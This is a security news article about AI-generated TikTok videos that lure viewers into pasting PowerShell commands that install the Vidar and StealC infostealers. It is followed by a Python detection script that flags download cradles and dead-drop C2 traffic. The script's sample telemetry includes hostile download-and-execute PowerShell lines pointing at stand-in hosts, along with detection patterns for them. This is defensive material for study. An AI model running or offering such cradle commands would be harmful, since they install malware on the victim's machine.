Fake TikTok Videos Lure Users into Installing Vidar and StealC Malware

Wednesday, May 28, 2025

Cybersecurity experts at Trend Micro have uncovered a malicious campaign in which cybercriminals use AI-generated TikTok videos to trick viewers into executing PowerShell commands that install information-stealing malware such as Vidar and StealC. The videos claim to show how to activate popular software like Windows, Microsoft Office, CapCut, or Spotify. There is no exploit involved: the clip walks the viewer through opening PowerShell and pasting a command, so the victim performs the installation with their own hands. Some of these deceptive clips have reached up to 500,000 views, highlighting how TikTok's recommendation algorithm can dramatically accelerate the spread of such threats.

Trend Micro reports that these videos share highly similar visual and audio patterns, strongly suggesting they were generated automatically with AI tools. The campaign underscores how threat actors exploit major social media platforms as a distribution channel for malware. One of the most viral videos received nearly half a million views, over 20,000 likes, and hundreds of comments, a sign that viewers trusted the content and an indication of how widespread the impact of such attacks can be.

Once the pasted PowerShell command has installed them, Vidar and StealC connect to Command-and-Control (C&C) servers to carry out further malicious activity. Vidar hides the details of its C&C infrastructure inside legitimate services: it stores the server address in public user profiles on Steam and Telegram and reads it back at runtime (a dead-drop resolver), so the first connection goes to a trusted domain rather than to an attacker-owned one. StealC, in contrast, connects directly to raw IP addresses, with no domain name to block or flag. Both approaches let the attackers keep control while slipping past defenses that rely on known-bad domains or file signatures. Experts warn that this trend calls for a shift in defensive strategy: behavioral analysis (for example, PowerShell download-and-execute cradles run by an interactive user, non-browser processes fetching Steam or Telegram profile pages, and fresh binaries connecting straight to an IP), social media monitoring, and user education, rather than relying solely on signature-based detection of code or domains.
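The behavioral triage the experts recommend can be sketched in a few rules run over endpoint telemetry. The following is an added example, not code from Trend Micro or Security Affairs: it takes constructed records approximating PowerShell Script Block Logging (event 4104) and Sysmon network-connection events (event 3), flags download-and-execute cradles by what the command does rather than which domain it contacts, and looks for the Vidar-style sequence of an unexpected process reading a Steam/Telegram profile and then connecting to a bare IP. All hosts, paths, domains, timestamps and IP addresses (RFC 5737 203.0.113.0/24) are invented for the example.

```python
"""Behavioral triage for ClickFix-style PowerShell cradles and dead-drop C2 lookups.
Added example with constructed telemetry; nothing here is taken from the reported campaign."""
import re
from collections import defaultdict

# Constructed sample events. "scriptblock" ~ PowerShell event 4104, "netconn" ~ Sysmon event 3.
# dest_host is the resolved name for the connection ("" = the process connected straight to an IP).
EVENTS = [
    {"ts": 100, "kind": "scriptblock", "host": "ws01", "user": "alice",
     "text": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"ts": 105, "kind": "scriptblock", "host": "ws01", "user": "alice",
     "text": "iex (irm https://activate-office.example.net/run)"},
    {"ts": 110, "kind": "netconn", "host": "ws01", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe",
     "dest_host": "steamcommunity.com", "dest_ip": "203.0.113.10", "dest_port": 443},
    {"ts": 112, "kind": "netconn", "host": "ws01", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe",
     "dest_host": "", "dest_ip": "203.0.113.45", "dest_port": 80},
    {"ts": 200, "kind": "scriptblock", "host": "ws02", "user": "bob",
     "text": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.org/x.ps1')\""},
    {"ts": 205, "kind": "netconn", "host": "ws02", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "dest_host": "", "dest_ip": "203.0.113.77", "dest_port": 8080},
    {"ts": 300, "kind": "netconn", "host": "ws03", "image": "C:\\Program Files (x86)\\Steam\\steam.exe",
     "dest_host": "steamcommunity.com", "dest_ip": "203.0.113.10", "dest_port": 443},
]

# Behavioral patterns: remote content fetched and executed in memory, whatever the URL is.
_EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
_FETCH = re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile|"
                    r"downloaddata|net\.webclient|start-bitstransfer)\b", re.I)
_EVASION = {
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded command": re.compile(r"-e(nc|ncodedcommand)\b", re.I),
}

def classify_scriptblock(text):
    """Return the behavioral indicators found in one logged script block (empty list = nothing seen)."""
    hits = []
    if _EXEC.search(text) and _FETCH.search(text):
        hits.append("download cradle: remote content piped into Invoke-Expression")
    hits.extend(name for name, rx in _EVASION.items() if rx.search(text))
    return hits

def find_cradles(events):
    """Script blocks that fetch and execute remote code, with host and user for triage."""
    out = []
    for ev in events:
        if ev["kind"] == "scriptblock":
            hits = classify_scriptblock(ev["text"])
            if hits:
                out.append({"host": ev["host"], "user": ev["user"], "ts": ev["ts"], "indicators": hits})
    return out

# Services the report names as Vidar dead-drop hosts. Traffic to them is normal for the real
# client or a browser, so the rule keys on which process is talking to them.
DEAD_DROP_HOSTS = {"steamcommunity.com", "t.me", "telegram.org"}
EXPECTED_CLIENTS = {"steam.exe", "telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_dead_drop_chains(events, window=60):
    """Vidar-style sequence: an unexpected process reads a dead-drop service and, within
    `window` seconds, the same process opens a connection straight to a raw IP."""
    per_image = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["kind"] == "netconn":
            per_image[(ev["host"], ev["image"])].append(ev)
    chains = []
    for (host, image), conns in per_image.items():
        if _basename(image) in EXPECTED_CLIENTS:
            continue
        for i, c in enumerate(conns):
            if c["dest_host"] not in DEAD_DROP_HOSTS:
                continue
            for later in conns[i + 1:]:
                if later["ts"] - c["ts"] > window:
                    break
                if not later["dest_host"]:
                    chains.append({"host": host, "image": image, "dead_drop": c["dest_host"],
                                   "c2_ip": later["dest_ip"], "c2_port": later["dest_port"]})
                    break
    return chains

def find_direct_ip_connections(events):
    """StealC-style pattern: a non-client process connecting to a bare IP with no resolved name.
    Weak alone, strong when paired with a cradle on the same host."""
    return [ev for ev in events if ev["kind"] == "netconn" and not ev["dest_host"]
            and _basename(ev["image"]) not in EXPECTED_CLIENTS]

def correlate(events, window=600):
    """Join a download cradle to follow-on direct-to-IP traffic on the same host within `window` seconds."""
    cradles = find_cradles(events)
    findings = []
    for ev in find_direct_ip_connections(events):
        for c in cradles:
            if c["host"] == ev["host"] and 0 <= ev["ts"] - c["ts"] <= window:
                findings.append({"host": ev["host"], "user": c["user"],
                                 "process": _basename(ev["image"]), "c2_ip": ev["dest_ip"]})
                break
    return findings

if __name__ == "__main__":
    for f in find_cradles(EVENTS) + find_dead_drop_chains(EVENTS) + correlate(EVENTS):
        print(f)
```

The point of keying on the behavior (fetch plus Invoke-Expression, a Temp-directory binary reading a Steam profile, a connection with no hostname) is that none of the rules depend on the attacker's current domain or IP, which is exactly what rotates between campaigns; the dead-drop rule is the one most likely to need tuning, since any unlisted legitimate client of those services will trip it.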

Source https://securityaffairs.com/178269/cyber-crime/fake-software-activation-videos-on-tiktok-spread-vidar-stealc.html